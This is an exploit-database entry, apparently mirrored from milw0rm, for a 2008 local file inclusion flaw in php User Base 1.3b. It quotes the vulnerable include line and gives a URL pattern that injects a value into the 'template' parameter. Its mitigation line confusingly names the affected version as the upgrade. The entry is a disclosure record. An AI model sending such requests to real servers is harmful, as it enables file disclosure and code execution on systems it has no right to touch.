header-logo
Suggest Exploit
vendor:
php User Base
by:
BeyazKurt
8.8
CVSS
HIGH
Local File Include
98
CWE
Product Name: php User Base
Affected Version From: 1.3b
Affected Version To: 1.3b
Patch Exists: YES
Related CWE: N/A
CPE: a:php_user_base:php_user_base:1.3b
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

php User Base (1.3b) Local File Include

The vulnerability exists due to insufficient sanitization of user-supplied input passed via the 'template' parameter to '/include/unverified.inc.php' script. A remote attacker can include arbitrary local files and execute arbitrary PHP code on the vulnerable system.

Mitigation:

Upgrade to the latest version of php User Base (1.3b) or apply the patch from the vendor.
Source

Exploit-DB raw data:

#####################################################
#Author : BeyazKurt - Bey4zKurt@Gmail.Com
#
#Script : php User Base (1.3b)
#Risk : Local File Include
#Download : http://sourceforge.net/project/showfiles.php?group_id=200632
#
#File : include/unverified.inc.php
#
#Code :
#
# <?php
#   include("./templates/$template/global.inc.php");
# ?>
#
#Exploit :
#
# Vuln.Com/include/unverified.inc.php?template=CODE
#
#----------------------------
#
#                            INDEPENDENT KOSOVA (H)
#
#Not : I Love You Gülsüm (F)
#Thnx : " XbrainhunterX (Mehmet Akif) XX Parti :D "
#####################################################

# milw0rm.com [2008-02-23]

Navigation

Suggest Exploit

Services By CQR